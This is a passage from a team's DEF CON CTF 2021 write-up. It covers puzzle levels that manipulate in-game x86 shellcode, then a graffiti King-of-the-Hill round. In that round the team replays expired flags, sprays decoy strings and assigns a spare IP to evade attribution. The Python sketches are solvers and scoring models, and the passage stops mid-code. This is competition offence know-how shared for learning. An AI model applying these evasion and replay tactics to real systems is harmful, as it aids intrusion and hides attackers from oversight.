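<p>The search can be sketched as a breadth-first search over per-tick actions. This is a minimal sketch, not the script we actually used. In the real solve, deciding whether an action crashes meant emulating the shellcode with Unicorn. Here that decision is delegated to a caller-supplied <code class="language-plaintext highlighter-rouge">step</code> function, and <code class="language-plaintext highlighter-rouge">toy_step</code> is an invented stand-in with a single crashing state.</p>

```python
from collections import deque

ACTIONS = ("run", "flip_h", "flip_v", "stop")


def search(initial_state, step, is_goal, max_depth=64):
    """Breadth-first search for the shortest sequence of per-tick actions.

    `step(state, action)` returns the next state, or None if the action leads
    to a crash. In the real solve that check came from emulating the code with
    Unicorn; here it is supplied by the caller. States must be hashable.
    """
    queue = deque([(initial_state, [])])
    seen = {initial_state}
    while queue:
        state, path = queue.popleft()
        if is_goal(state):
            return path
        if len(path) >= max_depth:
            continue
        for action in ACTIONS:
            nxt = step(state, action)
            if nxt is None or nxt in seen:
                continue
            seen.add(nxt)
            queue.append((nxt, path + [action]))
    return None


def toy_step(state, action):
    """Invented stand-in for the emulator: state is (pc, flip_mask)."""
    pc, flips = state
    if action == "run":
        # Pretend the instruction at pc 1 faults in the original layout.
        return None if (pc, flips) == (1, 0) else (pc + 1, flips)
    if action == "flip_h":
        return (pc, flips ^ 1)
    if action == "flip_v":
        return (pc, flips ^ 2)
    return state  # "stop" changes nothing in this toy model


print(search((0, 0), toy_step, lambda s: s[0] == 3))
```

<p>Keeping a <code class="language-plaintext highlighter-rouge">seen</code> set stops the search from revisiting states, for example flipping the same way twice. BFS also guarantees the returned path is the shortest, which matters when every move counts.</p>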

<p>Finally, we found a path through the shellcode that led to the desired instruction address mentioned above. We converted it into a list of movements in the game, and we were done with the level.</p>

<h3 id="consensual-hallucination">(Consensual) Hallucination</h3>

<p>The shellcode in this level was just an infinite loop and contained no actual “/bin/bash” string or anything of the sort, so we could ignore it. Looking at the board, we had <code class="language-plaintext highlighter-rouge">bug is bash</code>, which meant that we could pass this level if we managed to touch the bug icon in the upper-right corner of the game board.</p>

<p>This was yet another core mechanism of <em>Baba is You</em>, and since the shellcode no longer mattered, it was truly a game level. There isn’t much to say about it. We played it manually and found this solution:</p>

<ol>
  <li>Utilizing <code class="language-plaintext highlighter-rouge">lock bind disk</code>, we can push the floppy disk to the right side of the virus wall, while keeping the lock on the left side.</li>
  <li>Use the floppy disk as a hook to get <code class="language-plaintext highlighter-rouge">cpu</code> <code class="language-plaintext highlighter-rouge">is</code> <code class="language-plaintext highlighter-rouge">run</code> back to the left side of the virus wall.</li>
  <li>Use the <code class="language-plaintext highlighter-rouge">bind</code> mechanism to put the floppy disk on the bug icon and make it stay there by breaking <code class="language-plaintext highlighter-rouge">lock bind disk</code>.</li>
  <li>Line up <code class="language-plaintext highlighter-rouge">disk</code> <code class="language-plaintext highlighter-rouge">is</code> at the bottom in front of the virus wall, and put all the remaining blocks to the left of them.</li>
  <li>Push from left to right so the blocks pass through the virus wall and connect to the <code class="language-plaintext highlighter-rouge">zero</code> text block on the right-hand side.</li>
</ol>

<p>This would form a new rule <code class="language-plaintext highlighter-rouge">disk is zero</code> so the floppy disk block turned into Zero. Since the floppy disk was on the bug icon, the Zero was then on the bug so we successfully passed this level.</p>

<h3 id="upwind">UpWind</h3>

<p>This level introduced a lot of new mechanisms.</p>

<p>There was a new portal-like block, which corresponded to the <code class="language-plaintext highlighter-rouge">nrg</code> text block (although I have no idea what nrg means). Suppose <code class="language-plaintext highlighter-rouge">nrg is edit</code> was in effect and the player stood on one of the portal-like blocks. A pop-up would then appear and let you input a hex value. The game would write that value into the corresponding memory cell.</p>

<p>There was also a new “fan” mechanism. If <code class="language-plaintext highlighter-rouge">fan is wind</code> was in effect, every pushable block on the same row as the fan would move one block to the left, if possible.</p>
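<p>Here is one way to model a single tick of wind on one row. The rules in this sketch are our assumptions, not the game’s source. Blocks are processed from left to right, and a pushable block moves one cell left only if that cell is empty. A block that moves frees its old cell for the block behind it. A block that has been blown against the end of the row simply stays there.</p>

```python
def blow_left(row, pushable):
    """Apply one tick of `fan is wind` to a single row (toy model).

    `row` lists the cell contents from left to right (None means empty) and
    `pushable` is the set of block names the wind can move.
    """
    new_row = list(row)
    # Scan left to right: a block that moves leaves its cell empty, so the
    # block behind it can follow in the same tick.
    for i in range(1, len(new_row)):
        if new_row[i] in pushable and new_row[i - 1] is None:
            new_row[i - 1], new_row[i] = new_row[i], None
    return new_row


tunnel = [None, "cpu", "nrg", None, "wall", "nrg"]
print(blow_left(tunnel, {"cpu", "nrg"}))
```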

<p>After trying a lot of things, we arrived at a few basic observations:</p>

<ul>
  <li>We had to go to the bottom of the level and trigger <code class="language-plaintext highlighter-rouge">cpu is run</code>, however</li>
  <li>It was impossible to bring the processor into the wind tunnel because it would stick at the end and not allow us to pass through it, and</li>
  <li>It was also impossible to use the processor in the upper part of the level, because there weren’t enough portals for us to input a valid shellcode, and we couldn’t even use <code class="language-plaintext highlighter-rouge">jmp</code> because that required two bytes, but</li>
  <li>there was an <code class="language-plaintext highlighter-rouge">nrg</code> text block at the bottom of the level, so we could turn <code class="language-plaintext highlighter-rouge">nrg</code> into a CPU.</li>
</ul>

<p>So our idea was to push all the portal blocks into the wind tunnel, input a shellcode using the edit function, and leave the leftmost one untouched so that we could turn it into a CPU later.</p>

<p>However, we had overlooked one of the biggest problems: the wind blowing through the tunnel would push the CPU one block to the left each tick. We quickly came up with two potential solutions:</p>

<ol>
  <li>Write the shellcode so that even when the processor is blown back by one block, it still runs without issues. That means the last byte of each instruction has to double as the first byte of the next instruction.</li>
  <li>Write the shellcode in reverse, from right to left, so that the wind carries the CPU to the correct position. We could control when the CPU runs. So whenever the CPU reached the right position, we could execute one instruction, stop execution, and wait until it drifted to the next instruction on the left.</li>
</ol>
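<p>The constraint behind the first idea can be written down precisely. Assume the CPU executes one instruction and then drifts exactly one cell. An instruction of length <em>n</em> starting at <code class="language-plaintext highlighter-rouge">pc</code> then leaves the CPU at <code class="language-plaintext highlighter-rouge">pc + n - 1</code>, so each instruction must begin on the last byte of the previous one. The hypothetical helper below packs a list of encodings under that rule and rejects any pair whose shared byte disagrees. The byte strings in the example are placeholders, not real x86 instructions.</p>

```python
def lay_out_for_wind(instructions, drift=1):
    """Pack instruction encodings so that each starts where the wind leaves the CPU.

    Model (an assumption): after an n-byte instruction runs at address pc, the
    CPU would move to pc + n, but the wind pushes it `drift` cells back, so the
    next instruction must start at pc + n - drift. The bytes shared by two
    neighbouring instructions must agree, otherwise ValueError is raised.
    Returns the packed bytes and the start address of every instruction.
    """
    code = bytearray()
    starts = []
    pc = 0
    for insn in instructions:
        if len(insn) <= drift:
            raise ValueError("instruction is too short to make progress against the wind")
        shared = bytes(code[pc:])  # bytes already laid down at this address
        if insn[:len(shared)] != shared:
            raise ValueError(f"bytes at {pc:#x} do not match {insn.hex()}")
        code[pc:] = insn
        starts.append(pc)
        pc += len(insn) - drift
    return bytes(code), starts


# Placeholder encodings (not real instructions) that chain correctly.
packed, starts = lay_out_for_wind([b"\xaa\xbb", b"\xbb\xcc\xdd", b"\xdd\xee"])
print(packed.hex(), starts)  # aabbccddee [0, 1, 3]
```

<p>The hard part, which this sketch does not attempt, is finding real x86 instructions whose encodings happen to chain this way.</p>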

<p>The first required some real hardcore shellcode technique, and the second required precise timing. Neither was easy. Therefore, we split into two teams, one trying the first solution and the other trying the second. Eventually the first team got their answer out, and I had no idea how they did it.</p>

<h3 id="code-choreography">Code Choreography</h3>

<p>This level was very similar to level 5 <em>Ten Thousands Steps</em>.</p>

<p>Looking closely at the existing shellcode on the board, we realized that we had everything except for <code class="language-plaintext highlighter-rouge">cd 80</code> (<code class="language-plaintext highlighter-rouge">int 0x80</code>). There was already a <code class="language-plaintext highlighter-rouge">cd 81</code> on the board, so all we needed to do was turn that <code class="language-plaintext highlighter-rouge">81</code> into <code class="language-plaintext highlighter-rouge">80</code>. The question was: how?</p>

<p>We disassembled the entire memory starting at every offset and tried to find a combination of instructions that might work.</p>

<p>We first looked at address <samp>0xd1</samp>, which was <code class="language-plaintext highlighter-rouge">dec DWORD PTR [ecx+0xc1]</code>. We thought we had to somehow put <code class="language-plaintext highlighter-rouge">0x32</code> into <code class="language-plaintext highlighter-rouge">ecx</code> so that the sum would be <samp>0xf3</samp>, the memory address of the <code class="language-plaintext highlighter-rouge">81</code> byte we wanted to decrement. There were <code class="language-plaintext highlighter-rouge">inc eax</code> and <code class="language-plaintext highlighter-rouge">mov ecx, eax</code> on the board. My teammate wrote a script to automate the process: steer the character to push the processor to one location, come back, and execute that instruction, over and over. However, this quickly exceeded the 1000-step limit, so we had to look for something else.</p>

<p>We then turned our attention to the other <code class="language-plaintext highlighter-rouge">dec</code> on the board, at address <samp>0x9e</samp>. Immediately we saw <code class="language-plaintext highlighter-rouge">mov bl, BYTE PTR [eax]</code> and <code class="language-plaintext highlighter-rouge">mov BYTE PTR [eax], bl</code> around it. After more digging, we found another really interesting instruction, <code class="language-plaintext highlighter-rouge">or eax, DWORD PTR [eax+0x40]</code>, at address <samp>0xec</samp>. With some brute-forcing, we found an instruction <code class="language-plaintext highlighter-rouge">mov al, 0x61</code>. At exactly address <code class="language-plaintext highlighter-rouge">0xa1</code> (<code class="language-plaintext highlighter-rouge">0x61 + 0x40</code>), there was the value <code class="language-plaintext highlighter-rouge">0x90</code>. ORing <code class="language-plaintext highlighter-rouge">0x90</code> with <code class="language-plaintext highlighter-rouge">0x61</code> gives <code class="language-plaintext highlighter-rouge">0xf1</code>. Then all we needed to do was <code class="language-plaintext highlighter-rouge">inc eax</code> twice, and voilà, we had a way to decrement the value at <samp>0xf3</samp>.</p>

<p>Together the chain to decrease the value looked like this:</p>

<pre><code class="language-asm">e6:   b0 61                   mov    al, 0x61
ec:   0b 40 40                or     eax, DWORD PTR [eax+0x40]
ed:   40                      inc    eax
ee:   40                      inc    eax
9c:   8a 18                   mov    bl, BYTE PTR [eax]
9e:   4b                      dec    ebx
9f:   88 18                   mov    BYTE PTR [eax], bl
</code></pre>
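<p>Tracing the register values through this chain confirms the arithmetic: <code class="language-plaintext highlighter-rouge">0x61 + 0x40 = 0xa1</code>, <code class="language-plaintext highlighter-rouge">0x61 | 0x90 = 0xf1</code>, and two increments give <code class="language-plaintext highlighter-rouge">0xf3</code>. The sketch below replays the chain on a made-up 256-byte memory image that contains only the two bytes that matter. It assumes the upper bits of <code class="language-plaintext highlighter-rouge">eax</code> start at zero. It also assumes the three bytes after <code class="language-plaintext highlighter-rouge">0xa1</code> are zero, so the dword read there is exactly <code class="language-plaintext highlighter-rouge">0x90</code>.</p>

```python
MASK32 = 0xffffffff

# Hypothetical memory image holding only the two bytes that matter.
mem = bytearray(0x100)
mem[0xa1] = 0x90  # the value found at 0x61 + 0x40
mem[0xf3] = 0x81  # the second byte of `cd 81`

eax = 0  # assumption: the upper 24 bits of eax start out as zero
ebx = 0

eax = (eax & ~0xff & MASK32) | 0x61                          # mov al, 0x61
eax |= int.from_bytes(mem[eax + 0x40:eax + 0x44], "little")  # or eax, DWORD PTR [eax+0x40]
eax = (eax + 1) & MASK32                                     # inc eax
eax = (eax + 1) & MASK32                                     # inc eax
ebx = (ebx & ~0xff & MASK32) | mem[eax]                      # mov bl, BYTE PTR [eax]
ebx = (ebx - 1) & MASK32                                     # dec ebx
mem[eax] = ebx & 0xff                                        # mov BYTE PTR [eax], bl

print(hex(eax), hex(mem[0xf3]))  # 0xf3 0x80
```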

<p>Then all that was left to do was to build the remaining instructions.</p>

<h3 id="netmaze">NetMaze</h3>

<p>This was really the simplest non-gaming level here. All I did was write a DFS that explored in random order, and before long it found a path from the top-left to the bottom-right corner of the maze.</p>
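<p>A randomized DFS of this kind can be sketched in a few lines. The text-based maze format here (<code class="language-plaintext highlighter-rouge">#</code> for walls) is an assumption for illustration. The real level was navigated through the game’s own movement interface, which this sketch does not model.</p>

```python
import random


def random_dfs(maze, rng=None):
    """Find a path from the top-left to the bottom-right of a grid maze.

    `maze` is a list of strings where '#' is a wall and anything else is open.
    Neighbours are explored in a random order, so repeated runs can find
    different paths. Returns the list of (row, col) cells, or None.
    """
    rng = rng or random.Random()
    rows, cols = len(maze), len(maze[0])
    start, goal = (0, 0), (rows - 1, cols - 1)
    stack = [(start, [start])]
    seen = {start}
    while stack:
        (r, c), path = stack.pop()
        if (r, c) == goal:
            return path
        moves = [(1, 0), (-1, 0), (0, 1), (0, -1)]
        rng.shuffle(moves)
        for dr, dc in moves:
            nr, nc = r + dr, c + dc
            if not (0 <= nr < rows and 0 <= nc < cols):
                continue
            if maze[nr][nc] == "#" or (nr, nc) in seen:
                continue
            seen.add((nr, nc))
            stack.append(((nr, nc), path + [(nr, nc)]))
    return None


example = [
    "..#",
    "#..",
    "##.",
]
print(random_dfs(example, random.Random(0)))
```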

<p>The only catch was that the console output was not consistent. Sometimes the game displayed the segfault screen, but the console did not print a line saying segfault. So I patched the source script a bit so that the output matched the actual state.</p>

<h3 id="bub-and-bob">Bub and Bob</h3>

<p>Another pure game level. Our solution was something like this:</p>

<ol>
  <li>Fall from the left and push <code class="language-plaintext highlighter-rouge">ball is stop</code> all the way to the right so that <code class="language-plaintext highlighter-rouge">bub is stop</code> extends out.</li>
  <li>Ride the bubble back to the top.</li>
  <li>Fall from the right and bring <code class="language-plaintext highlighter-rouge">bub</code> down.</li>
  <li>Repeat steps 2 and 3 to bring <code class="language-plaintext highlighter-rouge">is</code> down.</li>
  <li>Form <code class="language-plaintext highlighter-rouge">bub is you</code> horizontally so you can control the little green dragon (called Bub). At the same time, break <code class="language-plaintext highlighter-rouge">zero is you</code>.</li>
  <li>Move bub to the middle of the screen and push up the middle <code class="language-plaintext highlighter-rouge">is</code> so <code class="language-plaintext highlighter-rouge">cpu is run</code> is in effect.</li>
  <li>Push <code class="language-plaintext highlighter-rouge">ball is</code> back out from right to left, and push them from the bottom to the top of the screen.</li>
  <li>Prepare <code class="language-plaintext highlighter-rouge">ball is</code> at the right of <code class="language-plaintext highlighter-rouge">cpu is x64</code>, but don’t connect them yet.</li>
  <li>At the right moment, connect <code class="language-plaintext highlighter-rouge">ball is cpu</code> and move straight to the start of the shellcode (starting at <code class="language-plaintext highlighter-rouge">83</code>). Once the bubble is produced, it will turn into the CPU and start running.</li>
</ol>

<p>Let it run to the end and we’re done. Unfortunately, at the exact moment we solved this level, the server went down, and that marked the end of day 1.</p>

<p>Here are the solutions to all 15 levels: <a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ" target="_blank" onclick="alert('sorry bout that')">Zero is You | 15 solutions - YouTube</a>.</p>

<h2 id="optimization">Optimization</h2>

<p>While a bunch of people were trying to solve the puzzles, another group of our KoH players was doing their best to optimize the existing solutions. Besides optimizing by hand, they wrote a fuzzing tool that randomly (maybe with a heuristic) deleted part of a solution or replaced a part with a shorter one.</p>
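<p>The deletion half of that idea can be sketched as a random shrinking loop. This is a minimal sketch of the idea, not our teammates’ tool. It only deletes random contiguous chunks and never replaces them. <code class="language-plaintext highlighter-rouge">is_valid</code> stands in for replaying the moves in the game, and the number-line validator in the example is invented.</p>

```python
import random


def shrink(solution, is_valid, rounds=2000, rng=None):
    """Randomly try to shorten a move sequence while keeping it valid.

    Each round deletes one random contiguous chunk; the shorter candidate is
    kept only if `is_valid` (a stand-in for replaying the moves in the game)
    still accepts it.
    """
    rng = rng or random.Random()
    best = list(solution)
    for _ in range(rounds):
        if not best:
            break
        i = rng.randrange(len(best))
        j = rng.randrange(i + 1, len(best) + 1)
        candidate = best[:i] + best[j:]
        if is_valid(candidate):
            best = candidate
    return best


# Toy validator: moves on a number line must end at position 3.
def ends_at_three(moves):
    return sum(1 if m == "R" else -1 for m in moves) == 3


original = list("RRLRLRR")
shorter = shrink(original, ends_at_three, rng=random.Random(1))
print("".join(shorter))
```

<p>Because a candidate is only accepted when it still validates, the result can never get worse than the input. It just may not reach the true minimum.</p>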

<p>Thanks to their effort, we successfully shrank many of our past solutions. However, under the game’s scoring method, every 5 moves we saved gave us only 1 point. That said, this fuzzing method proved its worth on the final day……</p>

<hr />

<p>Overall, we didn’t do well on the first day. Everyone was so good at playing games, and we just weren’t fast enough. We managed to reach fifth place by the time the game ended. Still, the way the KoH score works meant that the leading teams were already far ahead of us. We had to keep up in the following days!</p>

<h1 id="www">www</h1>

<p><img src="/assets/images/defcon-ctf-2021/www-score.png" alt="www-score" /></p>

<p>This King of the Hill game combined Attack/Defense, Penetration Testing, and maybe even Web all together. It was a really messy experience, but in a fun way.</p>

<h2 id="the-rule">The Rule</h2>

<p>The rules were simple. Each round, each team could exchange a <code class="language-plaintext highlighter-rouge">flag</code> string for a <code class="language-plaintext highlighter-rouge">graffiti</code> string, which could then be put onto other teams’ walls. A team got 1 point for putting a <code class="language-plaintext highlighter-rouge">graffiti</code> string onto another team’s <code class="language-plaintext highlighter-rouge">wall</code>.</p>

<p>The twist was accusation. Suppose a team could figure out which team put a <code class="language-plaintext highlighter-rouge">graffiti</code> on its wall, along with that team’s real <code class="language-plaintext highlighter-rouge">ip</code>. It could then accuse that team of vandalism. If the accusation succeeded, the vandalizing team lost the 1 point it had earned for the <code class="language-plaintext highlighter-rouge">graffiti</code>. It was also deducted 4 more points for vandalizing (and getting caught).</p>
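<p>The scoring makes the risk easy to quantify. A graffiti that goes unaccused is worth +1, while an accused one nets 1 − 1 − 4 = −4. Say a graffiti sprayed from a real IP gets accused with probability <em>p</em>. Its expected value is then (1 − p) · 1 + p · (−4) = 1 − 5p, which is positive only while p stays below 0.2. A small sketch of that calculation:</p>

```python
def graffiti_points(caught):
    """Net score change for one graffiti under the rules above."""
    earned = 1
    if caught:
        # The point is taken back and a 4-point penalty is applied.
        return earned - 1 - 4
    return earned


def expected_points(p_caught):
    """Expected score of one graffiti that is accused with probability p_caught."""
    return (1 - p_caught) * graffiti_points(False) + p_caught * graffiti_points(True)


for p in (0.0, 0.1, 0.2, 0.5, 1.0):
    print(f"p={p:.1f}: {expected_points(p):+.2f}")
```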

<p>There were two APIs on each team’s server:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">/graffiti_store</code>, which we could use to exchange a <code class="language-plaintext highlighter-rouge">flag</code> string for a <code class="language-plaintext highlighter-rouge">graffiti</code> string.</li>
  <li><code class="language-plaintext highlighter-rouge">/accuse</code>, which could be used to report a <code class="language-plaintext highlighter-rouge">graffiti</code> and <code class="language-plaintext highlighter-rouge">ip</code>.</li>
</ul>

<p>Each team also had a game box that it accessed over SSH. Within the game network, port <code class="language-plaintext highlighter-rouge">1337</code> on each team’s box was that team’s <code class="language-plaintext highlighter-rouge">wall</code>. By connecting to other teams’ port <code class="language-plaintext highlighter-rouge">1337</code>, a team could spray its graffiti onto their walls.</p>

<p>There were three more rules for the fairness and effectiveness of the game:</p>

<ul>
  <li>Teams could accuse retroactively, up to 6 rounds back.</li>
  <li>A team only had one chance to accuse a certain graffiti.</li>
  <li>A team had to pass the service availability check each round; otherwise, 15 points would be deducted for that round.</li>
</ul>
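<p>These rules translate directly into filters for an automatic accuser. The sketch below is hypothetical. <code class="language-plaintext highlighter-rouge">WallEntry</code>, <code class="language-plaintext highlighter-rouge">plan_accusations</code>, and the example IPs are made up, and how the wall log is actually obtained is not modeled. It skips entries older than the 6-round window and never accuses the same graffiti twice. It also skips any source IP it cannot trace to a team’s real IP instead of guessing, since a wrong guess burns the single chance.</p>

```python
from dataclasses import dataclass

ACCUSE_WINDOW = 6  # rounds back that an accusation may reach, per the rules


@dataclass(frozen=True)
class WallEntry:
    round_no: int
    graffiti: str
    source_ip: str


def plan_accusations(entries, current_round, source_to_real_ip, already_accused):
    """Choose (graffiti, real_ip) pairs to report this round.

    `source_to_real_ip` maps a source IP (a team box or a traced jump server)
    to the team's real IP. Accused graffiti are added to `already_accused`
    in place so they are never reported twice.
    """
    plan = []
    for entry in entries:
        if current_round - entry.round_no > ACCUSE_WINDOW:
            continue  # too old to accuse
        if entry.graffiti in already_accused:
            continue  # only one chance per graffiti
        real_ip = source_to_real_ip.get(entry.source_ip)
        if real_ip is None:
            continue  # untraced source: do not guess
        plan.append((entry.graffiti, real_ip))
        already_accused.add(entry.graffiti)
    return plan


# Hypothetical wall log: one direct spray, one too old, one via a jump box.
log = [
    WallEntry(10, "g1", "13.37.5.64"),
    WallEntry(3, "g2", "13.37.5.64"),
    WallEntry(9, "g3", "10.9.9.9"),
    WallEntry(8, "g1", "13.37.5.64"),
]
traced = {"13.37.5.64": "13.37.5.64", "10.9.9.9": "13.37.7.64"}
accused = set()
print(plan_accusations(log, 10, traced, accused))
```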

<h2 id="the-observation">The Observation</h2>

<p>Here are a few thoughts and observations we had after we read the rules, logged onto our game box, manually sprayed graffiti onto other teams’ walls, and accused other teams’ graffiti.</p>

<ol>
  <li>We had the IP address <code class="language-plaintext highlighter-rouge">13.37.228.64</code>, and other teams were scattered around <code class="language-plaintext highlighter-rouge">13.37.xx.64</code>. The <code class="language-plaintext highlighter-rouge">xx</code> did not correspond to the team ID, so we needed to scan the subnet to find the other teams’ machines. When accusing, however, you only needed to report the IP of each team’s box inside the network, not the IP that contains each team’s ID (i.e., not <code class="language-plaintext highlighter-rouge">10.13.37.xx</code>).</li>
  <li>There was a folder on the game box that contained a <code class="language-plaintext highlighter-rouge">flag</code> file and a bunch of pcaps. The <code class="language-plaintext highlighter-rouge">flag</code> content changed every round.</li>
  <li>The game recorded the IP address we used to spray graffiti (i.e., the source of the TCP connection) along with the graffiti string itself. Suppose we simply sprayed graffiti from our real IP address and other teams had an automatic accusing system. Then we were certain to get our points deducted.</li>
  <li>From 3, spraying graffiti from a team’s real IP was definitely a dominated strategy. Therefore, there had to be some way to hide a team’s real IP. This fact, the challenge’s description, and a later hint all pointed the same way: there were definitely some machines out there in the game network that we could take control of.</li>
  <li>Furthermore, there must have been other flags on these pwnable servers that we could use to buy graffiti. The rules of the game also hinted at this.</li>
  <li>Continuing from 4, there must have been a way to spot the real IP of the vandalizing team, even if it used a jump/zombie server to spray graffiti. In other words, there had to be a way to map jump/zombie servers’ IPs back to the real IPs of the teams using them, assuming each jump server was used by only one team.</li>
</ol>

<p>Even though we knew spraying from our real IP was not a good strategy, it gave us a chance to score some points until other teams wrote auto-accusing scripts, and before we had pwned any service. We could always turn it off once we saw our points being deducted.</p>

<p>I quickly started writing a script to automatically grab the <code class="language-plaintext highlighter-rouge">flag</code> string, exchange it for a <code class="language-plaintext highlighter-rouge">graffiti</code>, and spray it onto every other team’s wall. A few annoying things came up once we started:</p>

<ul>
  <li>The graffiti exchange endpoint was outside the game server, so I had to port-forward it over SSH.</li>
  <li>The SSH server had a really short <code class="language-plaintext highlighter-rouge">ClientAliveInterval</code>, so we had to manually set the <code class="language-plaintext highlighter-rouge">ServerAliveInterval</code> in our SSH clients.</li>
  <li>There was a maximum connection limit on the SSH port, so one of us had to set up a proxy and have everyone else connect through it.</li>
</ul>

<p>While I was writing that, one of my teammates was writing an accusing script, and the other members of our KoH group were scanning the subnet for other machines we could take over.</p>

<h2 id="the-turnabout">The Turnabout</h2>

<p>While my spraying script was running, some of my teammates noticed an interesting thing: if you used a <code class="language-plaintext highlighter-rouge">flag</code> string from a past round to exchange for a graffiti in the current round, you got a brand-new graffiti with no error message. Since the rules clearly said that both the <code class="language-plaintext highlighter-rouge">flag</code> and the <code class="language-plaintext highlighter-rouge">graffiti</code> lasted for only one round, I thought it might just be a bug, and that you couldn’t actually score with a <code class="language-plaintext highlighter-rouge">graffiti</code> string exchanged from an expired <code class="language-plaintext highlighter-rouge">flag</code>.</p>

<p>Nonetheless, there was no downside to collecting all past <code class="language-plaintext highlighter-rouge">flag</code>s, so I quickly added code to my script to save the current flag along with all the past ones. At every new round, the script exchanged all saved flags for graffiti strings and sprayed them onto every other team’s wall.</p>

<p>This completely changed the game: spraying graffiti exchanged from a past round’s flag did in fact count as a successful spray. For anyone who knew about this bug, the points earned per round grew linearly. Assuming a team had \(c\) “flag sources” (one plus the number of machines the team took over) and had been collecting flags for \(n\) rounds, it could get \(c\cdot n\) points in that round, and its total would be on the order of \(\Theta(c\cdot n^2)\).</p>
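<p>To make the growth concrete, here is a small sketch of the arithmetic. It relies on a simplifying assumption of ours, not something from the rules: each flag source yields one flag per round, and every hoarded flag buys one graffiti worth one point on a single wall. Summing \(c\cdot k\) over rounds \(k = 1, \dots, n\) gives \(c\cdot n(n+1)/2\), which is where the \(\Theta(c\cdot n^2)\) comes from. The function names are hypothetical.</p>

<pre><code class="language-python">def points_in_round(c, n):
    """Points earned in round n on a single wall (simplified model):
    c flag sources have each contributed one flag per round so far,
    and every hoarded flag still buys a graffiti that counts."""
    return c * n


def total_points(c, n):
    """Cumulative points after n rounds: c*1 + c*2 + ... + c*n."""
    return sum(points_in_round(c, k) for k in range(1, n + 1))


def closed_form(c, n):
    """c * n * (n + 1) / 2, i.e. Theta(c * n**2)."""
    return c * n * (n + 1) // 2


print(total_points(1, 40), closed_form(1, 40))  # 820 820
</code></pre>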

<p>Even without a second machine, we saw our points grow faster than ever. If we made no further progress on pwning other machines, this was our only hope.</p>

<h3 id="the-smoke">The Smoke</h3>

<p>During this time, we were worried (and almost certain) that some other team had an auto-accusing script running, so spraying more graffiti would get more points deducted. Therefore, we wrote a “smoking” machine, which simply generated random hex strings that looked like <code class="language-plaintext highlighter-rouge">graffiti</code> strings but were in fact counterfeits, and sprayed them onto other teams’ walls.</p>

<p>This way, the real <code class="language-plaintext highlighter-rouge">graffiti</code> strings would be hidden within a pool of fake ones. We figured that teams without a robust enough script would have a hard time accusing, because there were too many candidate accusations to make. It should also make our behavior harder to analyze.</p>

<p>Or at least that was the hope. Whether it had any effect, we never found out.</p>
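<p>A minimal sketch of the smoke idea follows. It is not the script we actually ran. It assumes graffiti are lowercase hex strings (the sample value below is made up), and the names <code class="language-plaintext highlighter-rouge">smoke</code> and <code class="language-plaintext highlighter-rouge">counterfeit</code> are hypothetical. Each real graffiti gets a fixed number of same-length random decoys, and the whole batch is shuffled so the real ones don’t stand out by position.</p>

<pre><code class="language-python">import random

HEX_DIGITS = "0123456789abcdef"


def counterfeit(length, rng):
    """A random lowercase hex string of the given length (a fake graffiti)."""
    return "".join(rng.choice(HEX_DIGITS) for _ in range(length))


def smoke(real_graffiti, decoys_per_real=9, seed=None):
    """Return the real graffiti shuffled into a pool of same-length fakes."""
    rng = random.Random(seed)
    batch = list(real_graffiti)
    for g in real_graffiti:
        batch.extend(counterfeit(len(g), rng) for _ in range(decoys_per_real))
    rng.shuffle(batch)
    return batch


batch = smoke(["3f9a0c1d2e4b5a6c"], seed=1)
print(len(batch))  # 10
</code></pre>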

<h3 id="the-fake-ip">The Fake IP</h3>

<p>Spoiler alert: until the end of the game, we weren’t able to find or pwn any other services. However, that doesn’t mean we didn’t get a fake IP of our own to spray graffiti with.</p>

<p>@cbmixx realized that, since we had root privileges on our own machine, we could give ourselves another IP within a subnet we controlled.</p>

<blockquote>
  <p>I don’t quite remember the exact prefix we controlled; it might have been /26 or something.</p>
</blockquote>

<p>After some trials, we were able to assign our machine a new IP address <code class="language-plaintext highlighter-rouge">13.37.228.65</code> (and later <code class="language-plaintext highlighter-rouge">13.37.228.66</code>). With an added iptables rule, all our outgoing traffic to port <code class="language-plaintext highlighter-rouge">1337</code> on other teams’ machines went out through the new IP address. For teams with an automated accusing script, this should have kept them from accusing us for a long time.</p>

<p>However, one big downside was that any team analyzing the graffiti logs manually would soon discover what was going on and map our fake IP back to our real one, because they shared the same prefix. Nonetheless, this was the best we could do.</p>

<h2 id="the-accusation">The Accusation</h2>

<p>Our connection to the game VPN was shut off by the admins, who said we were sending too much traffic through the network and DoSing the server. After spending some time figuring out where the traffic was coming from, we realized our accusing script was acting way too aggressively, so we had to take it down for a while.</p>

<p>@mcfx moved the accusing script to his local machine and only periodically pulled data from the remote server. He then analyzed the data all by himself and wrote a script to automatically map jump server IPs back to real IPs. He was able to figure out the real IPs of all the big players and their jump servers. I believe he was the sole reason PPP and Katzebin lost so many points.</p>

<p>There were many ways to find the real IP behind a jump server, and I’m not sure exactly which method @mcfx used. Nonetheless, here is what my idea was:</p>

<p>Suppose we had an <code class="language-plaintext highlighter-rouge">IP</code> whose real IP we didn’t know. We could keep a list of all possible real IPs behind it; the first time we met this <code class="language-plaintext highlighter-rouge">IP</code>, the list was just all other teams’ IP addresses. Then, for each <code class="language-plaintext highlighter-rouge">graffiti</code> sent out from that <code class="language-plaintext highlighter-rouge">IP</code>, we would accuse that <code class="language-plaintext highlighter-rouge">graffiti</code> using one of the IP addresses still on the list. Whenever the <code class="language-plaintext highlighter-rouge">/accuse</code> endpoint told us the accusation failed, we crossed that IP off the list, until one accusation succeeded.</p>
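<p>The elimination idea can be sketched as follows. <code class="language-plaintext highlighter-rouge">accuse</code> stands in for a hypothetical wrapper around the <code class="language-plaintext highlighter-rouge">/accuse</code> endpoint that returns <code class="language-plaintext highlighter-rouge">True</code> on success. Since a team only gets one chance per graffiti, each graffiti sent from the jump server tests exactly one candidate. The sketch also relies on the earlier assumption that each jump server is used by only one team.</p>

<pre><code class="language-python">def find_real_ip(jump_ip, graffiti_from_jump, team_ips, accuse):
    """Narrow down the real IP behind jump_ip by elimination.

    graffiti_from_jump: graffiti strings sprayed on our wall from jump_ip.
    team_ips: all other teams' real IPs (the initial candidate list).
    accuse(graffiti, ip): hypothetical /accuse wrapper, True on success.
    """
    candidates = list(team_ips)
    for graffiti in graffiti_from_jump:
        if not candidates:
            break
        guess = candidates[0]
        if accuse(graffiti, guess):
            return guess          # confirmed: jump_ip belongs to this team
        candidates.remove(guess)  # cross it off the list
    # If exactly one candidate survives, it must be the owner.
    return candidates[0] if len(candidates) == 1 else None


# Toy run with a fake oracle standing in for /accuse.
teams = ["13.37.1.64", "13.37.109.64", "13.37.2.64"]
print(find_real_ip("13.37.50.10", ["g1", "g2"], teams,
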